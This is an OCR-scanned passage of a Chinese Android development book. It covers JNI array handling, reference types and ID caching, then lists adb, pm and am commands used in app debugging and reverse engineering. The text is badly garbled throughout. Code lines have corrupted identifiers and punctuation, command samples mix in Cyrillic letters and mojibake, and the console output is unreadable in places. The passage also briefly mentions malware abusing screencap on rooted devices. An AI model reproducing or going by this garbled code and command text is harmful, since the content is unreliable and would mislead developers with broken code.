cout««" 数组 中 位 置 是 偶数 的 值 为 :"; 
for(jsize k=0;k<count ;k++){ 
cout<<int_arr_temp[k]<<','; 
} 


cout««endl; 


/ / 将 数组 中 一 段 (0-2) 数据 拷贝 到 内 存 中 ， 并 且 打 印 出 来 
jint* buffer = new jint[len]; 
/ / 获取 数组 中 从 0 开始 长 度 为 3 的 一 段 数据 值 
env->GetIntArrayRegion(jint_arr,0,3,buffer); 
cout<<" 打印 数组 中 0-3 一 段 值 :"， 
for(int 1=0;1<3;1++) { 

cout««buffer[l]««','; 
} 


cout««endl; 


/ / 将 数组 中 的 一 段 (3-7) 设置 成 一 定 的 值 ， 并 且 打 印 出 来 
jint* buffers = new jint[4]; 
for(int п=0;п<4;п++){ 
buffers[n] = п+1; 
} 
// 将 buffers 这 个 数组 中 值 设置 到 数组 从 3 开始 长 度 是 4 的 值 中 
env->SetIntArrayRegion(jint_arr,3,4,buffers); 
/ / 从 新 获取 数组 指针 
int arr = env-»GetIntArrayElements(jint, arr,NULL); 
cout««" 数组 中 3-7 这 段 的 值 变 成 了 :"; 
for(int ш=0;ш<1еп;ш++){ 
coub«eelnc arrim]ee',*s 
} 


cout««endl; 


/ / 调用 C++ 标准 库 中 的 排序 方法 sort(...), 传递 一 个 数组 的 开始 指针 和 结束 指针 
std::sort (int_arr,int_arr+len); 
/ / 和 迭代 打印 数组 中 的 元 素 
cout««" 数组 排序 后 的 结果 :"; 
for(jsize 1=0;1<1еп;1++){ 
coubeeint arr[i]ee',*: 
} 
cout««endl; 
/ / 释放 数组 指针 


env-»ReleaseIntArrayElements(jint arr,int arr,JNI ABORT); 


/ / 获取 Java tF XTZ Father 数组 属性 的 ia 

jfieldID fid obj arrays = 
env-»GetFieldID(env-»GetObjectClass(obj),"objArrays","[Lcom/jni/demo/Father;"); 
// 获取 Java 中 对 象 数 组 Father 属性 objarrays 的 对 象 

JobjectArray jobj arr = (jobjectArray)env-»GetObjectField(obj,fid obj arrays); 


// 从 对 象 数 组 中 获取 索引 值 为 1 的 对 象 Father 


Jobject jobj = env-»GetObjectArrayElement(jobj arr,1); 

// 获取 Father X Ж] class 对象 

jclass clazz father = env-»GetObjectClass(jobj); 

/ / 获取 Father 对 象 中 的 function 方法 的 id 

jmethodID id father function = env-»GetMethodID(clazz father,"function","()V"); 
// 调用 Father 对 象 中 的 function 方法 
env-»CallVoidMethod(jobj,id father function); 


// 在 本 地 创建 一 个 大 小 为 10 的 对 象 数组 ， 对 象 的 初始 化 都 是 jobj ， 

// 也 就 是 方法 的 第 三 个 参数 

jobjectArray jobj arr temp-env-»NewObjectArray (10,env-»GetObjectClass(jobj),jobj3); 
/ / 获取 本 地 对 象 数 组 中 第 4 个 对 象 

jobject jobj temp = env-»GetObjectArrayElement(jobj arr temp,3); 

// 调用 Father 对 象 中 的 function 方法 
env-»CallVoidMethod(jobj temp,id father function); 


frEclipseZmiXisí;, £&á5unE2-29Bmm. 


га Problems tm Javadoc [ig Declaration [Zl Console 23 LogCat 3 Debug 


zterminated > JNIDemo [Java Application] CAProgram FilesyJavaXre7XbinNavaw.exe [fa013 年 12 月 29 日 FA 
£952:55:4,3,12,56,1,23,45,67, 

mu-voEITzESI5:4,12,1,45, 

Hi£&ES-80-3—;R2:4,3,12, 

£ibi-7RBEEXSTI4,3,12,1,2,23,4,67, 

u5tT5rgR:1,2,3,3,4,4,12,67, 

Father:functian| 

Father:function 


图 2-29 Æ Eclipse 中 运行 的 结果 


2.7 C/C++ 中 的 引用 类 型 和 1D 的 绥 存 


2.7.1 引用 类 型 


从 Java 虚 拟 机 创建 的 对 象 传 到 本 地 C/C++ 代码 时 会 产生 引用 ， 根 据 Java 的 垃圾 回收 机 制 ， 只 要 有 引用 存在 束 不 会 触 友 该 引 
用 所 指 的 Java 对 象 的 垃圾 回收 。 下 面 介绍 C/C++ 中 的 引用 类 型 。 


1. 局 部 引用 


局 部 引用 是 最 常见 的 引用 类 型 ， 基 本 上 通过 JN1 返 回来 的 引用 都 是 局 部 引用 ， 例 如 使 用 NewObject 就 会 返回 创建 出 来 的 实例 
的 局 部 引用 ， 局 部 引用 只 在 该 native 国 数 中 有 效 ， 所 有 在 该 国 数 中 产生 的 局 部 引用 ， 都 会 在 国 数 返回 的 时 候 自 动 释放 ， 也 可 以 使 
用 DeleteLocalRef 函 数 手动 释放 该 3 引用。 那么 ， 既 然 局 部 引用 能 够 在 肖 数 返回 时 自动 释放 ， 为 什么 还 需要 DeleteLocalRef 冰 数 
呢 。 


实际 上 局 部 引用 存在 是 防止 其 指向 的 对 铺 被 垃圾 回收 ， 尤 其 是 当 一 个 局 部 引用 指向 一 个 很 万 大 的 对 象 ， 或 是 在 一 个 循环 中 生 
成 了 局 部 引用 。 最 好 的 做 法 残 是 在 使 用 完 该 对 象 后 ， 在 该 循环 尾部 把 这 个 引用 释放 挥 ， 以 确保 在 触及 垃圾 回收 器 的 时 候 能 够 回 


收 。 
在 局 部 引用 的 有 效 期 中 ， 可 以 传递 到 别 的 本 地 国 数 中 ， 要 强调 的 是 它 的 有 效 期 仍然 只 在 一 次 的 Java 本 地 卫 数 调用 中 ， 所 以 干 
万 不 能 用 C++ 全 局 变量 保存 它 或 者 把 它 定义 为 C++ 静 仿 局 部 变量 


2. 全 局 引用 


全 局 引用 可 以 跨越 当前 线程 ， 在 多 个 native 销 数 中 有 效 ， 不 过 需要 编程 人 员 手 动 来 释放 该 3 用 ， 全 局 引用 存在 期 间 会 防止 在 
Java 的 垃圾 回收 器 的 回收 。 


与 局 部 引用 不 同 ， 全 局 引用 的 创建 不 是 由 JNI 自 动 创建 的 ， 全 局 引用 是 需要 调用 NewGlobalRef 冰 数 ， 而 释放 它 需 要 使 用 
ReleaseGlobalRefbS2%, 


3. 弱 全 局 引用 


弱 全 局 引用 是 Java 1.2 新 出 来 的 功能 ， 与 全 局 引用 相似 ,创建 和 删除 都 需要 由 编程 人 员 来 进行 ， 这 种 引用 与 全 局 引用 一 样 可 
以 在 多 个 本 地 代码 中 有 效 ， 也 跨越 多 线程 有 效 。 不 一 样 的 是 ， 这 种 引用 将 不 会 阻止 垃圾 回收 器 回收 这 个 引用 所 指向 的 对 象 ， 使 用 
NewWeakGlobalRef 和 ReleaseWeakGlobalRef 来 产生 和 解除 3 引用 。 


天 于 5 引用 的 一 个 图 效 如 下 : 


jobject NewGlobalRef (Jobject obj); 
jobject NewLocalRef(jobject obj); 
jobject new WeakGlobalRef(jobject obj); 
void DeleteGobalRef(jobject obj); 

void DeleteLocalRef(jobject obj); 

void DeleteWeakGlobalRef(jobject obj); 


上 述 的 六 种 方法 很 好 理解 ， 这 里 残 不 做 解释 了 。 
Jboolean IsSameObject(jobject objl , jobject obj2); 
国 数 是 用 来 比较 两 个 引用 是 人 否 相等 ， 但 是 对 于 弱 全 局 引用 还 有 一 个 特别 的 功能 ， 如 果 把 NULL 传 入 要 比较 的 对 象 中 ， 惑 


能 够 判断 弱 全 局 引用 所 指向 的 Java 对 象 是 否 被 回收 。 


缓存 jfieldID/jmethodID， 取 得 jfieldID 和 jmethodID 的 时 候 会 通过 该 属性 /方法 名 称 加 上 签名 来 查询 相应 的 
jfieldiD/jmethodlD。 这 种 查询 相对 来 说 开销 大 ， 我 们 可 以 将 这 些 FieldIiD/MethodlD 绥 存 起 来 ， 这 样 就 需要 查询 一 次 ， 以 后 就 
是 用 缓存 起 来 的 FieldID/MethodID 了 。 


27.2 ”缓存 万 法 


1. 企 用 的 时 候 缓 仔 


在 native 代 码 中 使 用 static 局 部 变量 来 保 仓 已 经 坦 询 过 的 jd， 这样 束 不 会 在 每 次 阔 数 调用 时 坦 询 ， 而 只 要 第 一 次 查询 成 功 后 
就 保存 起 来 了 。 不 过 在 这 种 情况 下 整 不 得 不 考虑 多 线程 同时 调用 此 消 数 时 可 能 会 招致 同时 查询 的 危机 ， 不 过 这 种 情况 是 无 害 的 ， 
因为 查询 同一 个 属性 方法 的 iD 通常 返 回 的 是 一 样 的 值 : 


JNIEXPORT void JNICALL Java, Test native(JNIEnv* env, jobject ob] ) { 
static jfieldID fieldID string = NULL; 
jclass clazz = env-GetObjectClass (obj); 
if(fieldId string == NULL) { 
fieldId string = env-GetFieldID( 
clazz, "string", "Ljava/lang/String»"); 


static jfieldID fieldlD string9 NULL; 这 段 代 码 只 执行 一 次 。 


2. 在 Java 类 初始 化 时 缓存 


更 好 的 一 个 方式 是 在 任何 native 消 数 调 用 前 把 ID 全 部 存 起 来 ， 可 以 让 上 Java 在 第 一 次 加 载 这 个 类 的 时 候 首 先 调用 本 地 代码 初始 
化 所 有 的 jfieldiD/jmethodlD， 这 样 就 可 以 省 去 多 次 确定 ID 是 否 存 在 的 语句 。 当 然 ， 这 些 jfieldID/jmethodlD 是 定义 在 
C/C++ 的 全 局 ,使 用 这 种 方式 还 是 有 好 处 的 ， 当 Java 类 和 镍 载 或 者 重新 加 载 的 时 候 ， 也 会 调用 该 本 地 代码 来 重新 计算 ID 的 。 


//Java 代码 

public class TestNativet 
statici 

initNativeIDs(); 

} 
static native void initNativeIDs(); 
int proplnbt = 0; 
String propStr = 
public native void otherNative(); 


"nn. 
, 


//Native 代码 

//global variables 
J£leldID g propint id = 0; 
jtieldID а propSbr ad. = 0; 


JNIEXPORT void JNICALL Java TestNative initNativeIDs(JNIEnv* env, jobject clazz)(í 
g propInt id = GetFieldID(clazz, "propInt", "I"); 
g propStr id = GetFieldID(clazz, "propStr", "Ljava/lang/String;"); 


JNIEXPORT void JNICALL Java, TestNative otherNative(JNIEnv* env, jobject ob] ) { 
//get field with g propInt id/g propStr id... 


在 Java 中 使 用 静态 代码 块 进 行 初始 化 。 


28 ”本章 小 结 


本 章 主要 介绍 了 Andtoid 中 的 NDK 开 发 ， 其 实 Andtoid 中 的 NDK 就 是 Java 中 的 JNI， 两 者 没有 本 质 区 别 ， 特 别 是 在 语法 和 开发 流 
程 上 几乎 是 一 样 的 。 后 续 章节 有 很 多 地 方 会 用 到 这 里 的 相关 知识 ， 建 议 读者 能 够 自己 独立 编写 出 一 个 native 的 案例 ， 为 后 面 的 学 


习 做 准备 。 


第 3 章 Android 中 开发 与 逆向 常用 命令 总 结 


Android 中 开发 和 逆向 用 到 的 命令 很 多 ， 本 章 介 绍 一 些 隐 藏 但 却 非常 好 用 的 命令 ， 可 以 帮助 快速 找到 问题 ， 这 些 命令 都 是 我 


在 开发 实践 中 总 结 出 来 的 ， 大 家 不 妨 了 解 一 下 。 


3.1 基础 命令 
基础 命令 是 用 得 最 多 的 ， 下 面 介 绍 两 个 基础 命令 。 
1.саїав 


cat 命 令 主要 用 于 查看 文件 内 容 ， 这 个 命令 的 重要 性 不 言 而 喻 ， 有 时 候 想 查看 文件 信息 ， 当 然 可 以 借助 软件 查看 ， 但 是 这 个 
命令 非常 便捷 ， 更 重要 的 是 它 可 以 结合 grep 过 滤 内 容 信息 : 


rootBpisces: H cat demo.txt iyrep four 
cat demo.txt igyrep four 

f ourbrot her 

f ourbrot her 

rontlpisces:/ H . 


记 住 一 点 : Linux 中 的 过 滤 命 令 是 grep，Windows 中 的 过 滤 命 令 是 findstr。 
2.echo/touch 命 令 


echo 和 touch 命 令 可 以 方便 地 写 文件 ， 下 面 看 一 下 这 两 个 命令 的 结合 使 用 : 


rootüpiscesz/ HF touch "fourbrother" > demo.txt 
touch "faurbrother" > депо. txt 

rootüpisces:/ H echo "Fourbrother" > депо. txt 
echo "Fourbrothernr'" > demo.txt 

pootüpisces:/ # cat demo. txt 

cat demo. txt 

fourbrother 

rootl'pisces:^/ # echo "fourbrother'" >> demo.txt 
echo "£ourhrother'" >> demo.txt 

rootlpisces:,^/ H cat demo.txt 

cat demo.txt 

faurhbraother 

faurbrother 

roo0tHpisces-^/ Hf m 


这 里 可 以 看 到 用 echo 和 touch 命 令 写 内 容 到 文件 中 ， 然 后 用 cat 命 令 读 取 文件 信息 。 这 里 还 用 到 了 内 容重 定向 符 
号 “>” 和 “>>”， 这 两 个 符号 也 是 非常 有 用 的 ， 有 时 候 在 执行 一 条 命令 时 可 能 输出 的 结果 非常 多 ， 这 时 就 需要 借助 重 定向 命 
令 把 结果 输出 到 文本 中 。 后 面 还 会 提 到 这 个 用 途 。 


3.2 dEshellágp 


我 把 弟 用 命令 分 为 非 shell 命 令 和 shell 命 令 ， 当 然 这 样 分 类 有 后 不 合 常 规 。 为 了 好 理解 ， 我 把 需要 提前 用 adb shell 命 令 运行 


的 命令 叫做 shell 命 令 ， 直 接 用 adb shell 运 行 的 命令 叫做 非 shell 命 令 。 本 书 介 绍 非 shell 命 令 ， 下 一 节 介绍 shell 命 令 。 
1.adb shell dumpsys activity top 


说 明 : 可 以 查看 当前 应 用 的 activity 信 息 。 
用 法 : 运行 需要 查看 的 应 用 。 
案例 : 


аар shell dumpsys activity top 


D:*»adb shell dumpsys activity top МАСЕ JW / 
TASK com.cyanogenmod.trebuchet id-1 当前 1 用 的 包 名 


ACTIVITY com.cyanogenmod.trebuchet/org.cyanogenmod .trebuchet .CustomHomeLauncher 42ad5230 ріа-1960 497 和 潮 程 信息 以 及 
Local Activity 424а3е68 State: 
mResumed=true mStopped=false mFinished=false activity 名 称 
nLoadersStarted-true 
mnChangingConf igurations-false 
mCurrentConfiq-41.8 ?mcc?mnc zh CN ldltr sv368dp v368dp h615dp 488dpi nrml long port finger -keyb/u/h -nav/h s.4 


theneResource -nu11; 
FragmentManager misc state: 


mfictivitu-org.cyanogenmod.trebuchet.CustomHomeLauncher(?424a3e68 
nContainer-android.app.fictivitu$160424a4158 
mCurState-5 mStateSaved-false mDestroyed-false 
UiewRoot: 
mfidded-true mRemoved-false 
mConsumeBatchedInputScheduled-false 
mnPendingInputEuentCount =Й 
nProcessInputEventsScheduled-false 
nTraversalScheduled-false 
android.view.UieuRootlImpl$NatiuvePrelmeInputStage: mQueueLength-8 
android.view.UieuRootlImpl$ImelnputStage: mQueueLength-8 
android.view.UieuRootlImpl$NatiuePostlmeInputStage: mQueueLength-8 ^ Miew 结构 信息 
Choreographer: 
mFrameScheduled=false 
mnLastFrameTime-3088722801 459657 ms ago? 
Uiew Hierarchy: 


com.android.internal.policy.imnpl.PhoneUindovu$DecorUieuC424c5adB8 U.E..... E... I. 8.08-10880,1920°> 
android.vidget.LinearLayouti424c76680 U.E..... ...... I. 0,0-1888,1928»? 
android.uviewv.UiewuStubí424caBaB G.E..... ...... I. 0.0-0.0 #1020313? 
android.vidget.FrameLayoutí424ca5f8 U.E..... ...... I. 80,0-1880,19280 110280802 android:id/content? 
android.wvidget.FrameLayoutí424cae2080 U.E..... ...... I. 8,0-1088,1920 H?f10002c app:id/launcher? 
com.android.launcher3.DragLayeri(424cc328 U.E..... ...... I. 8,80-18088,1920 H"7£f1080802d app-:id/drag layer? 
comn.android.launcher3.Vorkspacet424d48898 U.EDH..L ...... I. -2868,-2448-3949,4369 WI?f100802e app:id/vorkspace? 


延伸 : 如 果 直 接 运 行 adb shell dumpsys 也 是 可 以 的 ， 只 是 会 把 当前 系统 中 所 有 应 用 运行 的 四 大 组 件 都 会 打印 出 来 ， 而 这 时 
候 会 友 现 打印 的 内 容 非常 多 ， 玖 需要 借助 之 前 说 到 的 信息 重 定 同 了 ， 上 有 具体 做 法 如 下 。 


这 里 还 借助 了 Windows 中 的 start 命 令 ， 可 以 直接 利用 系统 默认 程序 打开 文本 内 容 。 而 且 我 在 以 往 逆 向 应 用 的 时 候 ， 很 多 时 
候 都 用 到 这 个 命令 来 找到 突破 口 。 


аар shell dumpsys > info.txt 


一 一 一 一 一 一 一 


g Wndows\system32\cmd.exe 


D: "s 2padh shell dumpsus > infn.txt 


向 :> 号 二 去 二 info.txt 


| Е Info.txt - 记 吉 本 
УЕ) SE) 格式 (OQ) 查看 (V) ЖЕН) 


Currently runninz services: 
Fowerservicg 
SurtacePlinzer 
accessibilitv 
accourt 
activity 
alarm 
android. security. keystore 
appops 
appwl dget 
assetatlas 
audio 


2.adb shell dumpsys package 
说 明 : 可 以 查看 指定 包 名 应 用 的 详细 信息 (相当 于 应 用 的 AndroidManifest.xml 中 的 内 容 ) 。 
用 法 : adb shell dumpsys package[pkgname] 


案例 : 


adb shell dumpsys package com.tencent.mm 


D: s2>adhb shell dumpsus package com.tencent.mm 
Activity Resolver Table: 
Full MIME Types: 
und.android.cursor.item/Á/und.com.tencent.mm.chatting.profile: 
42hec'7a8 com.tencent.mm^.plugin.accountsunc.ui.Gontacts&unclI filter 42hec8f8 

fiction: "android.intent.action.UIEW' 
fiction: '"com.tencent.mm.login.RGCTIOM LOGIN" 
Category: "android.intent.category.DEFRULT'' 
Туре: "und.android.cursor.item^/und.com.tencent.mm.login" 
Туре: "und.android.cursor.item^/und.com.tencent.mm.chatting.profile'' 
Туре: "und.android.cursor.itemz^und.com.tencent.mm.chatting.voip" 
Туре: 'und.android.cursor.item^Á/und.com.tencent.mm.chatting.voip.video" 
Туре: 'und.android.cursor.item^/und.com.tencent.mm.plugin.sns.timeline" 
Туре: '"und.android.cursor.item^/und.com.tencent.mm.chattingy.phonenum'' 

und.android.cursor.item^Áund.com.tencent.mm.plugin.sns.timeline: 

42hec'7a8 com.tencent.mm^/.plugin.accountsunc.ui.Contacts&SuncUI filter 42hec8f8 

fiction: "android.intent.action.UTIEU" 
fiction: "com.tencent.mm.login.BCTIOM LOGIMH"' 
Category: "android.intent.categoruy.DEFRULT'' 
Туре: "und.android.cursor.item^/und.com.tencent.mm.login" 


这 里 融 是 相当 于 把 应 用 的 清单 文件 打印 出 来 而 已 。 


3.adb shell dumpsys meminfo 


襄 明 : 可 以 查看 指定 进程 名 或 者 进程 id 的 内 存 信息 。 

用 法 : adb shell dumpsys meminfo[pname/pid] 

案例 : 

аар shell dumpsys meminfo com.qihoo.appstore 
D:\>adhb shell dumpsys meminfo com.qihoo.appstore 


fipplications Memory Usage «kB»: 
Uptime: 309122212 Realtime: 431687909 


жж MEMINFO in pid 11563 [com.qihoo.appstore] ww 


Pss Private Private Swapped Heap Heap Heap 
Total Dirty Clean Dirty Size Alloc Free 
Native Heap 24 24 p a 24904 20588 1183 
Dalvik Heap 39408 39332 а а 42764 27086 15758 
Dalvik Other 6960 6880 а a 
Stack 552 552 a a 
fishnem 9652 9652 а a 
Other deu 241 236 4 a 
-so ттар 3454 2264 188 a 
.jar ттар 306 p 172 a 
-apk mmap 234 p 20 a 
-ttf mmap 619 a 124 a 
.dex mmap 8392 140 6168 а 
Other ттар 19 4 p p 
Unknoun 11905 18780 p a 
TOTAL 80866 69864 6676 а 67668 47506 16941 
Objects 
Uievs: 556 UiewRootImpl: 1 
fippContexts: 11 fictivities: 1 
fissets: 87 fissetManagers: 87 
Local Binders: 52 Proxy Binders: 85 
Death Recipients: 4 
OpenSSL Sockets: 1 
SQL 
MEMORV USED: 327 
PRAGECACHE OUERFLOU: 86 MALLOC SIZE: 62 


利用 这 个 命令 可 以 查看 进程 当前 的 内 存 情况 ， 和 后 面 的 top 命 令 可 以 结合 使 用 ,分 析 应 用 的 性 能 消耗 情 ; 


4.adb shell dumpsys dbinfo 


WB: 可 以 查看 指定 包 名 应 用 的 数据 库存 储 信息 (包括 存储 的 SQL 语句 ) 。 
用 法 : adb shell dumpsys dbinfo[packagename] 


案例 : 


аар shell dumpsys dbinfo com.qihoo.appstore 


D:*»adb shell dumpsus dbinfo com.qihoo.appstore 
Applications Database Info: 


== Database info for pid 11563 [com.qihoo.appstore]l xx 


Connection pool for /data/user/UWü/com.qihoo.appstore/databases/dounloadb5.db: 
Open: true 
Max connections: 1 
fivailable primary connection: 
Connection #0: 
isPrimaryConnection: true 
onlyfillouvReadOnlyOperations: false 
Most recently executed operations: 
Йй: [2017-08-23 88:14:180.5661 executeForCursorMindov took ims — succeec 
1: [2017-08-23 88:14:180.5661 executeForLong took gms — succeeded, sql: 
2: [2017-08-23 08:14:10.565] executeForLong took ims - succeeded, sql: 
3: [2017-88-23 88:12:18.4961 executeForCursorMindov took gms — succeec 
4: [2017-08-23 08:12:18 .495 1] executeForLong took Üms — succeeded, sql: 
5: [2017-08-23 808:12:18.495] executeForLong took gms — succeeded, sql: 
6: [2017-08-23 806:26:16.2171 executeForChangedRovCount took 80ms 一 suc 
.isHistoryInstall-?,dowvunloadUrl-?,0nlySilentInstall-?,resId-*? ,version-?,dounlc 
dPath-2?,encodeType-7?,1ogoUrl-?,size-?,onlyToDataDir-?,wholefipkSize-?,p2pDowunlc 
7: [2017-08-23 86:26:16.2171 prepare took gms — succeeded, sql="UPDATI 
.dounloadUrl-?,.o0nlySilentinstall-?,reslId-?,uversion-?,dounloadStatus-?,id-?,do« 
?.,logoUrl-?,size-?,onlyToDataDir-?,wholefipkSize-?,p2pDounloadUrl-?,md5-?,needt 
8: [2017-08-23 86:26:16.0971 executeForLastiInsertedRovId took 114ms – 
ytes.isHistoryInstall.dounloadUrl.onlySilentInstall.resId.,uersion,dounloadStat 
ize.onlyToDataDir,wholefipkSize,.p2pDounloadUrl,mdb5,needCheckfif terDounload,notU 3i 


ХЕНД ИДЕ SU FHEATISRJSQUIS MER, ХУЛ ТЫНЫН EUR — ERR., Ројал ЕЕЕ T , 
5.adb intall 

ТВА: 安装 应 用 包 apk 文 件 。 

用 法 : ааб install[lapk 文 件 ]。 

案例 : 

adb install D:Ndemo.apk 

注意 : 如 果 应 用 已 经 安装 了 ， 需 要 使 用 adb install-t[apk 文 件 ， 相 当 于 升级 安装 。 这 个 命令 就 不 多 说 了 ， 非 常 简单 。 
6.adb uninstall 

说 明 : Ж ЛУНД. 

用 法 : adb uninstall[packagename] 


案例 : 


аар uninstall cn.wjdiankong.demo 


和 上 面 的 命令 类 似 。 
7.adb pull 
说 明 : 将 设备 中 的 文件 放 到 本 地 。 
用 法 : adb pull 设 备 目 录 文 件 本 地 目录 。 
案例 : 


аар pull /sdcard/tmp.txt D:\ 


注意 ， 在 操作 的 时 候 可 能 遇 到 文件 权限 问题 ， 用 chmod 改 一 下 权限 即 可 。 
8.adb push 

说 明 : 将 本 地 文件 放 到 设备 中 。 

用 法 : adb push 本 地 目录 文件 设备 目录 。 

案例 : 


аар push D:Ntmp.txt /sdcard 


注意 ， 在 操作 的 时 候 可 能 遇 到 文件 权限 问题 ， 用 chmod 改 一 下 权限 即 可 。 
9.adb shell screencap 

襄 明 : 截屏 操作 。 

用 法 : ааб shell screencap-p 截 图 文件 路 径 。 

案例 : 


аар shell screencap -p /sdcard/tmp.png 


这 个 命令 对 于 测试 人 员 非 党 有用， 有 时候 想 快 速 截取 手机 屏幕 ， 只 要 快速 打开 ， 束 可 以 利用 这 个 命令 写 一 个 人 简 早 的 脚本 文 
件 ， 内 容 如 下 : 


аар shell screencap -p /sdcard/tmp.png 
adb pull /sdcard/tmp.png D:N 

start D:Ntmp.png 

这 样 束 一步 到 位 ， 很 快 打 开 一 个 截图 图 片 。 这 个 是 Windows 中 的 bat 命 令 格式 。 


延伸 : 一 些 恶 意 软 件 利用 设备 root 之 后 ， 运 行 该 命令 融 可 以 获取 用 户 当前 屏幕 信息 ， 对 于 次 取 账 号 非 囊 危险 。 


10.adb shell screenrecord 


ВВ: 录 屏 操作 。 

用 法 : adb shell screenrecord 视 频 保存 路 径 

案例 : 

аар shell ѕсгеепгесога /sdcard/tmp.mp4 


SAN 


这 个 命令 其 实 和 上 面 截屏 命令 差不多 ， 只 不 过 这 个 是 录制 屏幕 ， 对 于 测试 人 员 来 说 更 加 重要 ， 有 时候 想 复 现 问题 步骤 ， 那 么 
束 可 以 米 用 这 个 命令 进行 录 屏 功能 


延伸 : 现在 很 多 录 屏 软件 (在 5.0 之 前 版 本 ) 可 以 在 root 之 后 用 这 个 命令 进行 录 屏 功能 。 
11.adb shell input text 

说 明 : 输入 文本 内 容 。 

用 法 : adb shell input text[ 需 要 输入 文本 框 内 容 ] 

案例 : 

让 需要 输入 内 容 的 文本 框 获 取 焦 点 


аар shell input text 'HelloWorld' 


注意 : 这 个 命令 也 可 以 模拟 物理 按键 、 虚 拟 键 盘 、 滑 动 、 滚 动 等 事件 。 


延伸 : 这 个 命令 对 于 需要 输入 一 大 堆 信 息 到 文本 框 中 的 情况 非常 有 用 ， 比 如 在 PC 端 有 一 段 内 容 ， 想 输入 到 手机 的 某 个 搜索 
框 中 ， 那 么 可 以 通过 把 这 段 内 容 友 送 到 手机 ， 然 后 再 复制 操作 。 但 是 有 了 这 个 命令 融 非 名 简单 ， 先 让 想 要 输入 的 文本 框 获取 焦 
凡 ， 然 后 运行 这 个 命令 即 可 。 


12.adb forward 
说 明 : 设备 的 端口 转 友 。 
用 法 : adb forwrad[ (2) 协议 : 0511 (1520) 协议 : 05] 


案例 : 


аар forward tcp:23946 tcp:23946 
аар forward tcp:8700 jwdp:1786 


这 个 命令 在 IDA 调 试 中 非常 有 用 。 
13.adb jdwp 


说明: 查看 设备 中 可 以 被 调试 的 应 用 的 进程 号 


用 法 : adb jdwp 
案例 : 


аар jdwp 
这 个 命令 或 许 用 途 不 是 很 多 ， 但 是 在 调试 的 时 候 还 是 有 点 用 途 。 
14.adb logcat 


WBB: 查看 当前 日 志 信 息 。 

用 法 1: adb logcat-s tag 

案例 : adb logcat-s fb 

用 法 2: ааб logcat|findstr pname/pid/keyword 
案例 : ааб logcat|findstr cn.wjdiankong.demo 


这 个 命令 大 家 都 不 卫生， 也 是 重 中 之 重 ， 有 的 同学 或 许 会 好 奇 ， 为 何不 用 AS 查看 日 志 了 ， 但 是 有 时 候 As 不 能 满足 需求 ， 比 
如 想 开 多 个 日 志 窗 口 ， 这 时 候 可 以 打开 多 个 cmd 窗 口 利用 这 个 命令 查看 日 志 信 息 即 可 。 用 得 最 多 的 就 是 -s 参 数 ， 可 以 直接 查看 对 
应 的 tag 日 志 信息 ， 利 用 findstr 进 行 信息 过 滤 : 


D:N2>2adb logcat ifindstr tencent 

VU/Sustem.errC 18345: android.content.pm.PackageManager$NameNotFoun: 
VU/Sustem.errCX 18345: android.content.pm.PackageManager$NameNotFoun: 
I/füicctivityuManagerCX 111805: Start proc com.kingroot.kinguser:cc for : 
V/Sustem.errC 18345: android.content.pm.PackageManager$NameNotFoun: 
I/^fictivityuManagerCX 1118»: Start proc com.kingroot.kinguser:cc for : 
WU/Sustem.errC 18345: android.content.pm.PackageManager$NameNotFoun: 


这 里 因为 是 在 Windows 下 ， 所 以 用 findstr 进 行 信息 过 滤 了 ， 当 然 这 个 命令 也 可 以 直接 在 adb shell 运 行 之 后 ， 比 如 : 


>>аар shell 
>> logcat |grep tencent 


这 样 就 可 以 用 grep 进 行 信息 过 滤 了 。 


3.3 shellág 


我 所 说 的 shell 命 令 运行 的 前 提 是 先 运 行 adb shell， 而 这 些 命令 和 非 shell 命 令 都 是 互通 的 ， 所 谓 互 通 束 是 要 想 在 设备 中 运行 
shell 命 令 ， 束 优先 运行 adb shell 一 下 。 比 如 查看 当前 应 用 信息 ， 可 以 这 么 做 : 


>>аар shell 
>>dumpsys package [pkgname| 


也 可 以 直接 在 外 部 运行 ， 比 如 清空 应 用 数据 : 


аар shell pm clear [pkoname | 


1.run-as 
说 明 : 可 以 在 非 root 设 备 中 查看 指定 debug 模 式 的 包 名 应 用 沙 盒 数 据 。 
用 法 : run-as[package name] 


案例 : run-as cn.wjdiankong.demo 


后 面 章 节 会 详细 介绍 这 个 命令 的 原理 。 在 开 肥 中 有 时 候 对 一 个 非 root 手 机 想 看 debug 应 用 的 阔 使 数据 ， 那 么 这 


以 帮助 进行 这 项 操作 了 。 
2.ps 

襄 明 : 查看 设备 的 进程 信息 ， 或 者 指定 进程 的 线程 信息 。 

用 法 : ps|grep 过 滤 内 容 

ps-t[pid] 查 看 pid 对 应 的 线程 信息 

案例 : 

ps | grep cn.wjdiankong.demo 

ps -t 11798 

这 个 命令 的 重要 程度 不 必 多 说 ， 可 以 结合 grep 进 行 信息 过 滤 。 
3.pm clear 

襄 明 : 清空 指定 包 名 应 用 的 数据 。 

用 法 : pm clear[packagename] 

案例 : pm clear cn.wjdiankong.demo 

有 时 候 想 清空 一 个 应 用 的 数据 ， 可 能 需要 去 设置 页 面 进行 操作 。 可 以 不 用 那么 麻烦 ， 直 接 用 这 个 命令 即 可 。 
4.pm install 

说明: 安 妆 设备 中 的 apk 文 件 ， 功 能 和 adb install 一 样 。 

用 法 : pm install[apk fF] 

案例 : 


pm install / sdcard / demo.apk 


这 个 命令 与 adb install 命 令 一 样 。 


5.pm uninstall 
说 明 : Eikit УЛУН, 288 аар uninstall 一 样 。 
用 法 : pm uninstall[packagename] 
案例 : 
pm uninstall cn.wjdiankong.demo 
这 个 命令 和 adb uninstall 命 令 一 样 。 
6.am start 
说 明 : 启动 一 个 应 用 . 
用 法 : am start-n[ 包 (package) 名 ]/[ 包 名 ].[ 活 动 (activity) 名 称 ] 
案例 : 
am start -n com.android.browser/com.android.browser.BrowserActivity 
注意 : 可 以 用 debug 方 式 启动 应 用 (am start-D-n…) 。 特 别 在 反 编 译 调 试 应 用 的 时 候 ， 可 能 需要 用 debug 方 式 启 动 应 用 。 
7.am startservice 
说 明 : 启动 一 个 服务 。 
用 法 : am startservice-n[ 包 (package) 名 ]/[ 包 名 ].[ 服 务 (service) 名 ] 
案例 : 
am startservice -п com.android.traffic/com.android.traffic.maniservice 
和 上 面 命令 类 似 ， 局 动 服务 。 
8.am broadcast 
ІВ: 515—0 38. 
用 法 : am broadcast-a[ 广 播 动 作 ] 
案例 : 
am broadcast -a android.NET.conn.CONNECTIVITY CHANGE 
和 和 上面 的 命令 类 似 ， 友 送 一 个 广播 。 有 了 时候 定义 了 一 个 广播 ， 可 能 需要 测试 ， 束 可 以 借助 这 个 功能 模拟 友 送 一 个 广播 。 
9.netcfg 


说明: 查看 设备 的 ip 地 址 。 


